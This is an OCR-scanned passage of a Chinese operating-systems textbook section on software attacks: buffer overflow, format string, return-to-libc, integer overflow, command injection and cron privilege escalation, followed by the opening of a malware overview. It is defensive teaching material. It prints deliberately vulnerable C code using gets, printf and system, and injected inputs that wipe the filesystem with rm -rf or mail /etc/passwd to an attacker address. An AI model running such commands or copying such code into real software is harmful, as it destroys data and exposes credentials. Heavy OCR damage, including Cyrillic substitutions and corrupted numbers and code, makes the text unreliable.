且 用 它 来 进行 有 效 的 编译 )。 但 遗憾 的 是 ， 没 有 一 个 C 编 译 器 可 以 做 到 数组 边界 检查 。 如 下 面 的 代码 虽然 
并 不 合法 ， 但 系统 却 没 有 进行 检验 : 

intl; 

char с[10241; 

i=12000; 

с[й=0; 

结果 内 存 中 有 10 976 个 字 节 超出 了 数组 c 的 范围 ， 并 有 可 能 导致 危险 的 后 果 。 在 运行 时 没有 进行 任 
何 检查 来 避免 这 种 情况 。 

C 语 言 的 属性 导致 了 下 列 攻 击 。 在 图 9-24a 中 ， 我 们 看 到 主 程序 在 运行 时 局 部 变量 是 放 在 栈 里 的 。 在 
某 些 情况 下 ， 系 统 会 调用 过 程 A， 如 图 9-24b 所 示 。 标 准 的 调用 步骤 是 把 返回 地 址 (指向 调用 语句 之 后 的 
指令 ) 压 人 栈 ， 然 后 将 程序 的 控制 权 交 给 久 ， 由 A 不 断 减 少 栈 指针 地 址 来 分 配 本 地 变量 的 存储 空间 。 


虚拟 地 址 空间 虚拟 地 址 空间 虚拟 地 址 空间 


ОхЕЕЕЕ... 


主 程序 的 
жЕ 局 部 变量 


指针 


SP 


а) 


c) 


199-24 а) 主 程序 运行 时 的 情况 ，b) 调用 过 程 A 后 的 情况 ，c) 灰色 字体 表示 的 缓冲 溢出 
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假设 过 程 A 的 任务 是 得 到 完整 的 路 径 (可 能 是 把 当前 目录 路 径 和 文件 名 串联 起 来 )， 然 后 打开 文件 
实施 一 些 操作 。A 拥 有 固定 长 度 的 缓冲 区 (如 数组 ) B， 它 存放 着 文件 名 ， 如 图 9-24b 所 示 。 使 用 定 长 组 
冲 区 存放 文件 名 比 起 先 检测 实际 大 小 再 动态 分 配 空间 要 容易 得 多 。 如 果 缓冲 区 只 有 1024 个 字 节 ， 那 么 能 
够 放 得 下 所 有 的 文件 名 吗 ? 特别 是 当 操作 系统 把 文件 名 的 长 度 限制 (或 者 更 好 的 是 对 全 路 径 名 的 长 度 限 
制 ) 在 不 超过 255 (或 其 他 固定 的 长 度 ) 个 字符 时 。 

然而 ， 上述 推论 有 致命 的 错误 。 假 设 用 户 提供 了 一 个 长 达 2000 个 字符 的 文件 名 , 在 使 用 时 就 会 出 错 ， 
但 攻击 者 却 不 予 理会 。 当 过 程 A 把 文件 名 复制 到 缓冲 区 时 ， 文 件 名 溢出 并 覆盖 了 图 9-24c 的 灰色 部 分 。 更 
糟 的 是 ， 如 果 文 件 名 足够 长 ， 它 还 会 覆盖 返回 地 址 ， 这 样 当 过 程 A 返回 时 ， 返 回 地 址 是 从 文件 名 的 中 间 
截取 的 。 如 果 这 一 地 址 是 随机 数 ， 系 统 将 跳 到 该 随机 地 址 ， 并 可 能 引起 一 系列 的 误 操 作 。 

但 是 如 果 文件 名 没有 包含 某 些 随机 地 址 会 怎么 样 呢 ? 如 果 它 包含 的 是 有 效 的 二 进 制 地 址 并 且 设 计 得 
十 分 吻合 某 个 过 程 的 起 始 地 址 ， 那 又 会 怎么 样 呢 ? 例如 吻合 过 程 B 的 起 始 地 址 。 如 果真 是 这 样 ， 那么 当 
过 程 A 运 行 结束 后 ， 过 程 B 就 开始 运行 。 实 际 上 ， 攻击 者 会 用 他 的 恶意 代码 来 覆盖 内 存 中 的 原 有 代码 ， 
并 且 让 这 些 代码 被 执行 。. 

同样 的 技巧 还 运用 于 文件 名 之 外 的 其 他 场合 。 如 用 在 对 较 长 的 环境 变量 串 、 用 户 输入 或 任何 程序 员 
创建 了 定 长 缓冲 区 并 需要 用 户 输入 变量 的 场合 。 通 过 手工 输入 一 个 含有 运行 程序 的 串 ， 就 有 可 能 将 这 段 
程序 装 入 到 栈 并 让 它 运行 。C 语 言 函数 库 的 gets 函 数 可 以 把 (未 知 大 小 的 ) 串 变 量 读 入 定 长 的 缓冲 区 里 ， 
但 并 不 校 验 是 否 溢出 ， 这 样 就 很 容易 遭受 攻击 。 有 些 编译 器 其 至 通过 检查 gets 的 使 用 来 发 出 警告 。 

现在 我 们 来 讨论 最 坏 的 部 分 。 假 设 被 攻击 的 UNIX 程 序 的 SETUID 为 root (或 在 Windows 里 拥有 管理 
员 权 限 的 程序 ) ， 被 插入 的 代码 可 以 进行 两 次 系统 调用 ， 把 攻击 者 磁盘 里 的 shell 文 件 的 权限 改 为 SETUID 
root 的 权限 ， 这 样 当 程序 运行 时 攻击 者 就 拥有 了 超级 用 户 的 权限 。 或 者 ， 攻击 者 可 以 映射 进 一 个 特定 的 
共享 文件 库 ， 从 而 实施 各 种 各 样 的 破坏 。 还 可 以 十 分 容易 地 通过 exec 系 统 调用 来 覆盖 当前 shell 中 运行 的 
程序 ， 并 利用 超级 用 户 的 权限 建立 新 的 shell。 

更 精 的 是 ， 逐 意 代码 可 以 通过 互联 网 下 载 程序 或 脚本 ， 并 将 其 存储 在 本 地 磁盘 上 。 此 后 该 恶意 代码 
就 可 以 创建 一 个 进程 直接 从 本 地 运行 恶意 程序 或 是 脚本 。 该 进程 可 以 一 直 监 听 IP 端 口 ， 从 而 等 待 攻击 者 
的 命令 ， 这 将 目标 机 器 变 为 僵尸。 恶意 代码 必须 保证 每 次 机 器 启动 后 ， 恶意 程序 或 脚本 可 以 被 启动 ， 然 
而 不 论 在 Windows 或 所 有 版 本 的 UNIX 系 统 下 ， 这 都 是 很 容易 实现 的 。 

绝 大 多 数 系统 安全 问题 都 与 缓冲 区 溢出 漏洞 相关 ， 而 这 类 漏洞 很 难 被 修复 ， 因为 已 有 的 大 量 C 代 码 
都 没有 对 缓冲 区 溢出 进行 检查 。 

检测 程序 是 否 有 缓冲 区 溢出 问题 较为 简单 ， 只 要 输入 一 个 10 000 字 符 长 度 的 文件 名 ， 或 100 位 数字 
的 薪水 金额 ,或 一 般 不 太 会 遇 到 的 数字 、 观 察 主 程序 是 否 停止 。 接着 分 析 代码 找到 长 字符 串 存放 的 位 置 。 
从 这 个 位 置 得 到 团 盖 返回 地 址 的 字符 就 不 准 了 。 如 有 源 代 码 ， 则 对 大 多 数 UNIX 程 序 来 说 就 很 容易 实施 
攻击 ， 因 为 栈 的 布局 事先 是 知道 的 。 对 付 这 类 攻击 的 办 法 是 修改 代码 ， 显 式 地 检查 用 户 输入 的 所 有 变量 
的 长 度 ， 从 而 避免 把 长 字符 串 放 人 定 长 缓冲 里 。 但 是 ， 实际 上 有 些 程序 在 一 次 攻击 得 手 以 后 就 变 得 更 易 
遭受 攻击 。 


9.6.2 格式 化 字符 串 攻击 

尽管 很 多 程序 员 都 是 很 好 的 打字 员 ， 但 事实 上 他 们 都 不 愿意 打字 。 将 变量 名 reference_count 缩 写 为 
rc 表达 了 相同 的 意思 ， 却 可 以 在 每 次 使 用 该 变量 的 时 候 减 少 了 13 个 字符 的 输入 ， 对 程序 员 来 说 何 乐 而 不 
为 呢 ? 然而 这 种 偷懒 行为 在 下 面 描述 的 情况 中 ， 却 可 能 导致 系统 灾难 性 地 崩溃 。 

考虑 下 面 的 C 程 序 代码 片段 ， 该 段 代码 打印 了 一 段 欢迎 信息 : 

char *s = "Hello World"; 

printf("%s", s); 
在 这 段 代码 声明 了 一 个 字符 指针 类 型 的 变量 s， 该 变量 被 初始 化 指向 ~ 个 字符 串 “Helle World"， 注 意 在 这 
个 字符 串 的 末尾 有 一 个 额外 的 字符 “\0， 用 以 标记 该 字符 囊 的 结束 。 函 数 printf 被 传人 两 个 参数 ， 其 中 格 
式 化 字符 申 “%s” 指 定 系统 接 下 来 打印 的 是 一 个 字符 串 ， 第 二 个 参数 s 则 告诉 printf 该 字符 品 的 起 始 地 址 。 
当 被 执行 的 时 候 ， 这 段 代码 会 在 屏幕 上 打印 出 “Hello World”( 在 任何 标准 输出 中 ， 都 可 以 成 功 执行 )。 


374 #9} 


但 是 ， 如 果 程 序 员 懒 情 地 将 上 述 代码 段 写 为: 

char *s = "Hello World”; 

printf(s); 

这 样 调用 printf 是 合法 的 ， 因 为 printf 具 有 可 变 个 数 的 参数 ， 其 中 第 一 个 参数 必须 是 格式 化 字符 由 
(Format String) ， 当 然 不 包括 任何 格式 信息 (如 “%s") 的 字符 串 也 是 允许 的 ， 所 以 尽管 第 二 种 编程 风 
格 并 不 推荐 ， 但 在 这 里 并 不 会 出 问题 ， 而 且 它 还 使 得 程序 员 少 敲 了 五 个 按键 ， 似 乎 是 不 错 的 改进 。 

6 个 月 以 后 ， 其 他 程序 员 要 求 对 这 段 代码 进行 修改 ， 首 先 询 问 用 户 的 姓名 ， 在 对 该 用 户 发 出 特定 的 
欢迎 信息 。 在 章 率 阅读 完 原先 的 代码 后 ， 该 程序 员 只 做 了 一 点 改变 ; 


char 5[100], 9[100] = "Hello"; 性 声明 数组 Ss 和 g， 并 初始 化 9 */ 
gets(s); 个 从 键盘 读 取 字 符 串 ， 存 放 到 数组 s 中 */ 
strcat(g, 5); 个 把 连接 到 g 的 末尾 */ 

printf(g); "шина '/ 


这 段 代码 首先 将 用 户 输入 的 字符 串 存 人 *， 然 后 将 * 连 接 到 已 经 被 初始 化 的 字符 串 8 之 后 ， 以 在 g 中 形 
成 最 终 的 输出 信息 。 到 现在 这 种 方式 依然 能 够 正确 地 显示 结果 (gets 函 数 很 容易 遭受 缓冲 区 溢出 攻击 ， 
然而 由 于 其 便于 书写 ， 因 此 到 现在 依然 流行 ) 。 

然而 ， 如 果 一 个 对 C 语 言 有 所 了 解 的 用 户 看 到 了 这 段 代 码 ， 他 会 立刻 意识 到 程序 从 键盘 输入 的 并 不 
只 是 一 个 简单 的 字符 串 ， 而 是 一 个 格式 化 字符 串 (Format String)， 因 此 任何 格式 化 标识 符 都 会 起 作用 。 
尽管 绝 大 多 数 格式 化 标识 符 都 规范 了 输出 (án, “ws”: 打印 一 个 字符 串 ，“9%d":， 打印 一 个 十 进 制 整 
数 )， 有 一 些 却 比 较 特 殊 。 特 别 是 “%n” ， 它 不 打印 出 任何 信息 ， 而 是 计算 直到 “%n” 出 现 之 前 ， 总 共 
打印 了 多 少 字符 ， 并 且 将 这 个 数字 保存 到 printf 下 一 个 将 要 使 用 的 参数 中 去 。 下 面 给 出 一 个 使 用 “%n” 
的 例子 ; 

int main(int argc, char *argv[]) 

{ 


inti=0; 
printf("Hello %nworld\n", 81): еп 前 出 现 的 字符 个 数 保存 到 变量 1 中 */ 
printf(™ = %dì\n", i); 个 i 现在 的 值 为 6 */ 


} 

当 这 段 代码 被 编译 运行 后 ， 输 出 为 : 

Hello Могіа 

i=6 

注意 到 i 的 值 在 函数 printf 中 以 一 种 很 不 显眼 的 方式 被 修改 了 。 这 种 特性 只 在 极 少数 情况 下 有 用 ， 它 
意味 着 打印 一 个 格式 化 字符 串 可 能 导致 一 个 单词 (或 者 很 多 单词 ) 被 存储 在 内 存 中 。 很 显然 让 printf 具 
有 这 样 的 特性 并 不 是 一 个 好 主意 ， 然 而 这 个 功能 在 当时 看 来 是 非常 方便 的 。 绝 大 多 数 软件 的 弱点 都 是 因 
此 而 存在 。 

就 像 我 们 刚刚 看 到 的 一 样 ， 由 于 程序 员 对 程序 不 严谨 的 修改 ， 可 能 导致 用 户 有 了 输入 格式 化 字符 囊 
的 机 会 。 而 打印 一 个 格式 化 字符 串 可 能 导致 内 存 被 重 写 (overwrite) ， 这 就 为 覆盖 栈 中 printf 函 数 的 返回 
地 址 提供 了 一 种 方法 ， 通 过 重 写 这 个 返回 地 址 ， 可 以 使 得 函数 在 printf 函 数 返回 时 跳 到 任何 位 置 ， 例 如 
跳 到 刚刚 输入 的 格式 化 字符 串 。 这 种 攻击 方式 叫做 格式 化 字符 事 攻击 (format string attack), 

一 旦 用 户 可 以 修改 内 存 并 强制 程序 跳 转 到 一 段 新 注入 的 代码 段 ， 这 段 代 码 就 具有 了 被 攻击 程序 所 拥 
有 的 所 有 权限 。 如 果 该 程序 是 SETUID root， 那 么 攻击 者 就 可 以 创建 一 个 具有 root 权 限 的 shell。 实现 这 种 
攻击 的 具体 细节 过 于 复杂 ， 本 书 不 再 鞘 述 。 这 里 只 想 让 读者 知道 ,格式 化 字符 串 攻击 是 一 个 严重 的 问题 。 
如 果 读 者 在 Google 搜 索 栏 中 输入 “format string attack”( 格 式 化 字符 串 攻 击 )， 会 找到 很 多 的 相关 信息 。 

另外 ， 值 得 一 提 的 是 ， 在 本 节 的 例子 中 ， 采 用 定 长 字符 数组 也 很 容易 遭受 缓冲 区 溢出 攻击 。 


9.6.3 返回 libc 攻 击 
缓冲 区 溢出 攻击 和 格式 化 字符 串 攻击 都 要 求 向 栈 中 加 入 必要 的 数据 ， 并 将 函数 返回 的 地 址 指向 这 些 
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数据 。 一 种 防止 这 种 攻击 的 方法 是 设 定 栈 页 面 为 读 / 写 权限 ， 而 不 是 执行 权限 。 虽 然 大 多 数 操作 系统 都 
一 定 不 支持 这 个 功能 ， 但 现代 的 “奔腾 ”CPU 可 以 做 到 这 一 点 。 还 有 一 种 攻击 在 栈 不 能 被 执行 的 条 件 下 
也 能 奏效 ， 这 就 是 返回 libc 玫 去 (return to libc attack) 。 

假设 一 个 缓冲 区 溢出 攻击 或 格式 化 字符 串 攻 击 成 功 修改 了 当前 函数 的 返回 地 址 ， 但 是 无 法 执行 栈 中 
的 攻击 代码 ， 那 么 还 能 否 通过 修改 当前 函数 的 返回 地 址 到 指定 位 置 来 实现 攻击 呢 ? 答案 是 肯定 的 。 几 乎 
所 有 的 C 程 序 连接 了 libc 库 (通常 该 库 为 共享 的 ) ， 这 个 库 包括 了 C 程 序 几乎 所 有 的 关键 函数 ， 其 中 的 一 
个 就 是 strcpy。 该 函数 将 一 个 任意 长 度 的 字符 串 从 任意 地 址 复制 到 另 一 地 址 。 这 种 攻击 的 本 质 是 欺骗 
strepy 函 数 将 恶意 程序 (通常 是 共享 的 ) 复制 到 数据 段 并 在 那里 执行 。 

下 面 让 我 们 观察 这 种 攻击 实现 的 具体 细节 。 在 图 9-25a 中 ， 函 数 f 在 main 函 数 中 被 调用 ， 形成 图 中 的 
栈 。 我 们 假设 这 个 程序 在 超级 用 户 的 权限 下 运行 (如 ，SETUID root), 并 且 存 在 漏洞 使 得 攻击 者 可 以 将 
自己 的 shellcode 注 入 到 内 存 中 ， 如 图 9-25b 所 示 。 此 时 这 段 代码 在 栈 顶 ， 因 此 无 法 被 执行 。 


虚拟 地 址 空间 虚拟 地 址 空间 
主 程序 局 部 变量 
主 程序 局 部 变量 
返回 地 址 
栈 指针 F 的 局 部 变量 
程序 程序 


图 9-25 a) 攻击 之 前 的 栈 ，b) 被 重 写 之 后 的 栈 


除了 将 shellcode 放 到 栈 顶 ， 攻 击 者 还 需要 重 写 图 9-25b 中 阴影 部 分 的 四 个 字 。 这 四 个 字 的 最 低地 址 
之 前 保存 了 该 函数 的 返回 地 址 (返回 到 main) ， 但 现在 它 保存 的 是 strcpy 函 数 的 地 址 ， 所 以 当 f 返 回 的 时 
候 ， 它 实际 上 进入 了 strepy。 在 strepy 中 ， 栈 指针 将 会 指向 一 个 伪造 的 返回 地 址 ， 该 函数 完成 后 会 利用 该 
地 址 返回 。 而 这 个 伪造 的 返回 地 址 所 指向 的 ， 就 是 攻击 者 注 和 人 shellcode 的 地 址 。 在 返回 地 址 之 上 的 两 个 
字 分 别 是 strepy 函 数 执行 复制 操作 的 源 地 址 和 目的 地 址 。 当 strepy 函 数 执行 完毕 ， shelicode 被 复制 到 可 执 
行 的 数据 段 ， 同 时 strepy 函 数 返 回 到 shellcode 处 。shellcode 此 时 具有 被 攻击 程序 所 有 的 权限 ， 它 为 攻击 
者 创建 一 个 shell， 并 开始 监听 一 些 IP 端 口 ， 等 待 来 自 攻击 者 的 命令 。 从 此 刻 起 ， 这 人 台 机 器 变 成 了 僵尸 机 
器 (zombie)， 可 以 被 用 来 发 送 垃圾 邮件 或 者 发 起 “拒绝 服务 攻击 ”(denial-of-service attack ) 。 


9.6.4 © ШШЕ 

计算 机 进行 定 长 整 型 数 的 运算 ， 整 型 数 的 长 度 一 般 有 8 位 、16 位 、32 位 和 64 位 。 如 果 相 加 或 相 乘 的 
结果 超过 了 整 型 数 可 以 表示 的 最 大 值 ， 就 称 溢出 发 生 了 。C 程 序 并 不 会 捕捉 这 个 错误 ， 而 是 会 将 错误 的 
结果 存储 下 来 并 继续 使 用 。 一 种 特别 的 情况 是 ， 当 变量 为 有 符号 整数 时 ， 两 个 整数 相 加 或 想 成 的 结果 可 
能 因为 溢出 而 成 为 负数 。 如 果 变量 是 无 符号 整数 ， 溢 出 的 结果 依然 是 整数 ， 不 过 会 围绕 0 和 最 大 值 进行 
循环 (wrap around) 。 例 如 ， 两 个 16 位 无 符号 整数 的 值 都 是 40 000, 如 果 将 其 相 乘 的 结果 存 人 另 一 个 一 
个 16 位 的 无 符号 整 型 变量 中 ， 其 结果 将 会 是 4096。 

由 于 这 种 溢出 不 会 被 检测 ， 因 此 可 能 被 用 作 攻击 的 手段 。 -种 方式 就 是 给 程序 传人 两 个 合法 的 (但 
是 非常 大 ) 的 参数 ， 它 们 的 和 或 乘积 将 导致 游 出 。 例 如 ， 一 些 图 形 程序 要 求 通过 命令 行 传人 图 像 文件 的 
高 和 宽 ， 以 便 对 输入 的 图 像 进行 大 小 转换 。 如 果 传 入 的 高 度 和 宽度 会 导致 面积 的 “НН”, ЕЖЕН 
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误 地 计算 存储 图 像 所 需要 的 内 存 空 间 ， 从 而 可 能 申请 一 块 比 实 际 小 得 多 的 内 存 。 至 此 缓冲 区 溢出 攻击 的 
时 机 已 经 成 熟 。 对 于 有 符号 整 型 数 ， 也 可 以 采用 相似 的 办 法 进行 攻击 。 
9.6.5 代码 注入 攻击 

使 得 目标 程序 执行 它 所 不 期 望 的 代码 是 一 种 攻击 形式 。 比 如 有 时 候 需 要 将 用 户 文件 以 其 他 文件 名 另 
存 (如 为 了 备份 )。 如 果 程序 员 为 了 减轻 工作 量 而 直接 调用 系统 函数 ， 开 启 一 个 shell 并 执行 shell 命 令 。 
如 下 的 C 代 码 

System("ls >file-list") 

开启 shell， 并 执行 命令 

15 >file-list 

列 出 当前 目录 下 的 文件 列表 ， 将 其 复制 到 叫做 file-list 的 目录 下 。 如 上 面 所 说 ， 程 序 员 写 的 代码 可 能 
如 图 9-26 所 示 。 


int main(int argc, char «агдур) 


char згс[100], dst{100], cmd[205] = "cp "; 六 声明 3 个 字符 数组 */ 
printf("Please enter пате of source file: "); 让 提示 输入 源 文件 名 */ 
gets(src); 个 从 键盘 获取 输入 信息 */ 
strcat(cmd, src); 个 把 输入 信息 连接 在 "cp" 后 面 */ 


strcat(cmd, 个 在 cmd 末 尾 加 入 一 个 空格 */ 
printt("Please enter пате of destination file: "); /" 提示 输入 目的 文件 名 */ 
gets(dst); 个 从 键盘 获取 输入 信息 */ 
strcat(cmd, dst); 构造 完整 的 cmd*/ 
system(cmd); 个 执 行 复制 命令 

[ 


图 9-26 可 能 导致 代码 注入 攻击 的 程序 


该 程序 的 功能 是 输入 源 和 目的 文件 名 后 ， 用 cp 命令 产生 一 条 命令 ， 最 后 调用 system 执 行 这 条 命令 。 
如 果 用 户 分 别 输入 “abc” 和 “xyz"， 产 生 的 命令 为 : 

Ср abc xyz 
它 确 实 是 在 复制 文件 。 

不 幸 的 是 ， 这 段 代码 在 有 一 个 巨大 的 安全 漏洞 ， 可 以 用 代码 注 和 方法 进行 攻击 。 假如 用 户 输入 
“abc” 和 “xyz; rm -rf"， 命 令 就 变 成 了 : 

Ср abc хуг; rm -rf/ 
先 复制 文件 ， 然 后 递归 地 删除 整个 文件 系统 中 所 有 文件 和 文件 夹 。 如 果 该 程序 以 系统 管理 员 权限 运行 ， 
此 命令 就 会 完全 执行 。 问 题 的 关键 在 于 ， 分 号 后 的 字符 都 会 命令 的 方式 在 shell 中 执行 。 

输入 参数 另 一 个 构造 例子 可 以 是 “xyz; тай snooper@badguys.com< /etc/passwd"， 产 生 如 下 命令 ， 

Ср abc хуг; mail snooper@badguys.com< /etc/passwd 
将 etc 目 录 下 passwd 文 件 发 送 到 了 一 个 不 可 信 的 邮箱 中 了 。 


9.6.6 权限 提升 攻击 

另 一 类 攻击 叫做 权限 提升 攻击 (privilege escalation attack) ， 即 攻击 者 欺骗 系统 为 其 赋予 比 正 常情 
况 下 更 高 的 权限 (一 般 情况 下 攻击 者 都 希望 获取 超级 用 户 权限 )。 比 较 著名 的 例子 是 利用 计划 任务 
(стоп daemon) 进行 攻击 。cron daemon 帮 助 用 户 每 隔 固 定 的 时 间 进 行 工作 (每 个 小 时 、 每 天 、 每 周 等 )。 
стоп daemon 通 常 都 运行 在 root 权 限 下 ， 以 便 可 以 访问 任何 用 户 的 文件 。 它 有 -个 目录 专门 存放 一 系列 指 
令 ， 来 完成 用 户 计划 的 一 系列 工作 。 当 然 该 目录 不 能 被 用 户 修改 ， 否则 任何 人 都 可 以 利用 root 权 限 做 任 
何事 情 了 。 

攻击 过 程 如 下 : 攻击 者 的 程序 将 其 目录 设 定 为 cron daemon 的 工作 目录 ， 此 时 该 程序 并 不 能 对 此 目 
录 进行 修改 ， 不 过 这 并 不 会 对 攻击 有 任何 影响 。 该 程序 接 下 来 将 引发 一 次 系统 故障 ， 或 者 直接 将 自己 的 
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进程 结束 ， 从 而 强制 产生 一 次 内 存 信息 转 储 (соге dump)。 信 息 转 储 是 由 操作 系统 在 cron daemon 目 录 下 
引发 的 ， 因 此 不 会 被 系统 保护 机 制 所 阻止 。 攻 击 者 程序 的 内 存 上 映像 因此 被 合法 地 加 入 到 cron daemon 的 
命令 行 中 ， 接 下 来 将 会 在 root 权 限 下 被 执行 。 首 先 该 程序 会 将 攻击 者 指定 的 某 些 程序 提升 为 SETUID root 
权限 ， 第 二 部 则 是 运行 这 些 程序 。 当 然 这 种 攻击 方式 现在 已 经 行 不 通 了 ， 不 过 这 个 例子 可 以 帮助 读者 了 
解 这 类 攻击 的 大 致 过 程 。 


9.7 恶意 软件 
在 2000 年 之 前 出 生 的 年 轻 人 有 时 候 为 了 打发 无 聊 的 时 间 ， 会 编写 一 些 恶 意 软件 发 布 到 网 络 上 ， 当 然 
他 们 的 目的 只 是 为 了 娱乐 。 这 样 的 软件 (包括 木马 、 病 毒 和 蠕虫 ) 在 世界 上 快速 地 传播 开 来 ， 并 被 统一 
称 为 恶意 软件 (malware)。 当 报道 上 强调 某 个 恶意 软件 造成 了 数 百 万 美元 的 损失 ， 或 者 无 数 人 丢失 了 他 
们 宝贵 的 数据 ， 恶 意 软件 的 作者 会 惊讶 于 自己 的 编程 技艺 竟然 能 产生 如 此 大 的 影响 。 然 而 对 于 他 们 来 说 ， 
这 只 不 过 是 一 次 恶作剧 而 已 ， 并 不 涉及 任何 利益 关系 。 
然而 这 样 天 真 的 时 代 已 经 过 去 了 ,现在 的 恶意 软件 都 是 由 组 织 严密 的 犯罪 集团 编写 的 ， 他 们 所 做 的 
一 切 只 是 为 了 钱 ， 而 且 并 不 希望 自己 的 事情 被 媒体 报道 。 绝 大 多 数 这 样 的 恶意 软件 的 设计 目标 都 是 “ 传 
播 越 快 越 好 ， 范 围 越 广 越 好 "。 当 一 台 机 器 被 感染 ， 恶 意 软件 被 安装 ， 并 且 向 在 世界 某 地 的 控制 者 机 器 
报告 该 机 器 的 地 址 。 用 于 控制 的 机 器 通常 都 被 设置 在 一 些 欠 发 达 的 或 法 制 宽松 的 国家 。 在 被 感染 的 机 器 
中 通常 都 会 安装 一 个 后 门 程序 (backdoor) ， 以 便 犯罪 者 可 以 随时 向 该 机 器 发 出 指令 ， 以 方便 地 控制 该 
机 器 。 以 这 种 方式 被 控制 的 机 器 叫做 侍 尸 机 器 (zombie)， 而 所 有 被 控制 的 机 器 合 起 来 称 做 僵尸 网 络 
(botnet， 是 robot network 的 缩写 ) 。 
控制 一 个 僵尸 网 络 的 罪犯 可 能 处 于 恶意 的 目的 《通常 是 商业 目的 ) 将 这 个 网 络 租借 出 去 。 最 通常 的 
一 种 是 利用 该 网 络 发 送 商业 垃圾 邮件 。 当 一 次 垃圾 邮件 的 攻击 在 网 上 爆发 ， 警 方 介入 并 试图 找到 邮件 的 
来 源 ， 他 们 最 终 会 发 现 这 些 邮件 来 自 全 世界 成 千 上 万 台 计算 机 ， 如 果 警 方 继续 深入 调查 这 些 计算 机 的 拥 
有 者 ， 他 们 将 会 看 到 从 孩子 到 老 妇 的 各 色 人 物 ， 而 其 中 不 会 有 任何 人 承认 自己 发 送 过 垃圾 邮件 。 可 见 利 
用 别人 的 机 器 从 事 犯罪 活动 使 得 找到 藉 后 黑手 成 为 一 件 困难 的 事情 。 
安装 在 他 人 机 器 中 的 恶意 软件 还 可 以 用 于 其 他 犯罪 活动 ， 如 勒索 。 想 象 一 下 ， 一 台 机 器 中 的 恶意 软 
件 将 磁盘 中 的 所 有 文件 都 进行 了 加 密 ， 接 着 显示 如 下 信息 ， 
GREETINGS FROM GENERAL ENCRYPTION! 
TO PURCHASE А DECRYPTION KEY FOR YOUR HARD DISK, PLEASE SEND $100 IN 
SMALL, UNMARKED BILLS ТО ВОХ 2154, РАМАМА CITY, РАМАМА. ТНАМК YOU. WE 
APPRECIATE YOUR BUSINESS. 
恶意 软件 的 另 一 个 应 用 是 在 被 感染 机 器 中 安装 一 个 记录 用 户 所 有 敲 击 键盘 动作 的 软件 (键盘 记录 器 
keylogger) ， 该 软件 每 隔 一 段 时 间 将 记录 的 结果 发 送 给 其 他 某 台 机 器 或 一 组 机 器 (包括 僵尸 机 器 ) ， 最 终 
发 送 到 罪犯 手中 。 一 些 提供 中 间接 收 和 发 送信 息 的 机 器 的 互联 网 提供 者 通常 是 罪犯 的 同伙 ， 但 调查 他 们 
同样 困难 。 
罪犯 在 上 述 过 程 中 收集 的 键盘 敲 击 信息 中 ， 真 正 有 价值 的 是 一 些 诸如 信用 卡 卡号 这 样 的 信息 ， 它 可 
以 通过 正当 的 商业 途径 来 购买 东西 。 受 害 者 可 能 知道 还 款 期 才能 发 现 他 的 信用 卡 已 经 被 盗 ， 而 此 时 犯罪 
分 子 已 经 用 这 张 卡 道 遥 度 过 了 几 天 甚至 几 个 星期 。 
为 了 防止 这 类 犯罪 ， 信 用 卡 公司 都 采取 人 工 智能 软件 检测 某 次 不 同 寻 常 的 消费 行为 。 例 如 ， 如 果 一 
个 人 通常 情况 下 只 会 在 本 地 的 小 商店 中 使 用 他 的 信用 卡 ， 而 某 一 天 它 突然 预订 了 很 多 台 串 贵 的 笔记 本 电 
脑 并 要 求 将 他 们 发 送 到 塔吉克 斯 坦 的 某 个 地 址 。 这 时 信用 卡 公司 的 警报 会 响起 ， 员 工会 与 信用 卡 拥 有 者 
进行 联系 ， 以 确认 这 次 交易 。 当 然 犯罪 分 子 也 知道 这 种 防御 软件 ， 因 此 他 们 会 试图 调整 自己 的 消费 习惯 ， 
并 力图 避 开 系统 的 检测 。 
在 僵尸 机 器 上 安装 的 其 他 软件 可 以 搜集 另外 一 些 有 用 的 信息 ， 这 些 信息 与 键盘 记录 其 搜集 的 信息 结 
合 起 来 ， 可 能 使 得 犯罪 分 子 从 事 更 加 广泛 的 身份 盗窃 (identity theft) 犯罪 。 罪 犯 搜集 了 一 个 人 足够 的 
信息 ， 如 他 的 生日 、 母 亲 出 嫁 前 的 姓名 、 社 会 安全 码 、 银 行 账号 、 密 码 等 ， 因 此 可 以 成 功 地 模仿 受害 者 ， 
并 得 到 新 的 实物 文档 ， 如 替换 驾驶 执照 、 银 行 签 账 卡 (Бапк debit сага), 、 出 生 证 明 等 。 这 些 信息 可 能 被 
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卖 给 其 他 罪犯 ， 从 而 从 事 更 多 犯罪 活动 。 

利用 恶意 软件 从 事 的 另 一 种 犯罪 是 窃取 用 户 账户 中 的 财产 ， 该 类 恶意 软件 平时 一 直 处 在 潜伏 状态 ， 
直到 用 户 正确 地 登录 到 他 的 网 络 银行 账户 中 去 ， 该 软件 立刻 发 起 一 次 快速 的 交易 ， 查 看 该 账户 有 多 少 余 
额 ， 并 将 所 有 的 钱 都 转 到 罪犯 的 账户 中 ， 这 笔 钱 接着 连续 转移 很 多 个 账户 ， 以 便 警 方 在 追踪 现金 流 走向 
的 时 候 需 要 花 很 多 天 甚至 儿 个 星期 来 获得 查看 账户 的 相关 许可 。 这 种 犯罪 通常 设计 很 大 的 交易 量 ， 已 经 
不 能 视 为 青少年 的 恶作剧 了 。 

恶意 软件 不 只 会 被 有 组 织 的 犯罪 团伙 所 使 用 ， 在 工业 生产 中 同样 可 以 看 到 其 身影 。 一 个 公司 可 能 会 
向 对 手 的 工厂 中 安装 一 些 恶意 软件 ， 当 这 些 恶意 软件 检测 到 没有 管理 员 处 于 登录 状态 时 ， 便 会 运行 并 干 
扰 正常 的 生产 过 程 ， 降 低产 品 的 质量 ， 以 此 来 给 竞争 对 手 制造 麻烦 。 而 在 其 他 情况 下 这 类 恶意 软件 不 会 
做 任何 事情 ， 因 此 难以 被 检测 到 。 

另 一 种 恶意 软件 可 能 由 野心 勃勃 的 公司 领导 人 所 利用 ， 这 种 病毒 被 投放 在 局 域 网 中 ， 并 且 会 检测 它 
是 否 在 总 裁 的 计算 机 中 运行 ， 如 果 是 ， 则 找到 其 中 的 电子 报表 ， 并 随机 交换 两 个 单元 格 的 内 容 。 而 总 裁 
迟早 会 基于 这 份 错误 的 报表 做 出 不 正确 的 决定 ， 到 时 等 待 他 的 就 是 被 籼 钢 鱼 的 下 场 ， 成 为 一 个 无 名 之 斐 。 

一 些 人 无 论 走 到 哪里 房 膀 上 都 会 有 一 个 芯片 请 不 要 与 肩膀 上 的 RFID 芯 片 弄 混 )。 他 们 对 社会 充满 
了 或 真实 或 想象 中 的 怨恨 ， 想 要 进行 报复 。 此 时 他 们 可 能 会 选择 恶意 软件 。 很 多 现代 计算 机 将 BIOS 保 存 
